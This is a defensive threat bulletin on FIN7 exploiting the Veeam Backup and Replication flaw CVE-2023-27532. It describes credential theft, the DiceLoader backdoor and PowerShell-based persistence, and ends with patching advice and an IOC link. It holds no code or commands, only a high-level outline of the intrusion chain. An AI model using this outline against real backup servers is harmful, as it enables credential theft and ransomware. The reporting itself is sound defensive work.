Cyber Security Threat Summary:
According to researchers at WithSecure, a Finnish cybersecurity and privacy company, threat actors have been leveraging a recently fixed vulnerability in Veeam Backup and Replication software to target unpatched Veeam backup servers. The vulnerability in question is being tracked as CVE-2023-27532 and allows unauthenticated users in the backup infrastructure to obtain encrypted credentials stored in the VeeamVBR configuration database.

WithSecure stated in a recent report that they observed the attacks in late March. Based on the tactics, techniques, and procedures observed, researchers attributed the attacks to FIN7, a financially motived cybercriminal group that is known for partnering up with various ransomware groups including Conti, REvil, Maze, Egregor, BlackBasta.

In the latest campaign, researchers believe FIN7 actors likely exploited the vulnerability to gain initial access and execute malicious code. Using telemetry data from WithSecure’s Endpoint Detection and Response, they noticed that some Veeam servers generated suspicious alerts (e.g. sqlservr[.]exe spawning cmd[.]exe and downloading PowerShell scripts).

“A closer look showed that the threat actor initially executed the PowerTrash PowerShell script, seen in past attacks attributed to FIN7, that included a payload - the DiceLoader/Lizar backdoor, to be executed on the compromised machine. DiceLoader, also tracked as Tirion, has also been linked to FIN7 malicious activity in the past. It is worth noting that more recent incidents attributed to this gang made use of a different backdoor that Mandiant researchers call PowerPlant. Neeraj Singh, a senior researcher at WithSecure, told BleepingComputer that DiceLoader and PowerTrash were not the only connections to FIN7 activity. A PowerShell script (host_ip[.]ps1) for resolving IP addresses to hostnames and a custom one used for reconnaissance in the lateral movement stage of the attack are also known to be part of FIN7's toolkit. Once they got access to the host, the hackers used their malware, various commands, and custom scripts to collect system and network information, as well as credentials from the Veeam backup database. Persistence for DiceLoader was achieved trough a custom PowerShell script called PowerHold, the researchers at WithSecure say, adding that the threat actor also attempted lateral movement using stolen credentials, testing their access with WMI invocations and ‘net share’ commands” (Bleeping Computer, 2023).

Security Officer Comments:
Thankfully, the attacks were interrupted before the actors got a chance to execute the final payload. As such, the motive behind the latest attacks is unclear. However, WithSecure stated that the intrusions could of led to the deployment of ransomware if the attach chain was successfully completed.

The development comes after Horizon3 released an exploit for CVE-2023-27532 on March 23. The pentesting company demonstrated how an unsecure API endpoint could be leveraged to extract credentials in plain text. Furthermore, the company also noted that a threat actor could exploit the flaw to remotely run code with the highest privileges.

Suggested Corrections:
Last month, Huntress Labs warned that there were approximately 7,500 internet-exposed VBR hosts that appeared to be vulnerable. While the number of vulnerable instances has likely decreased, there are still several unpatched servers which are susceptible to attacks.

WithSecure recommends organizations that use Veeam Backup and Replication to patch their backup servers and look for signs of compromise on their network using the information provided in its advisory.

IOCs:
https://github.com/WithSecureLabs/iocs/tree/master/FIN7VEEAM

Link:
https://www.bleepingcomputer.com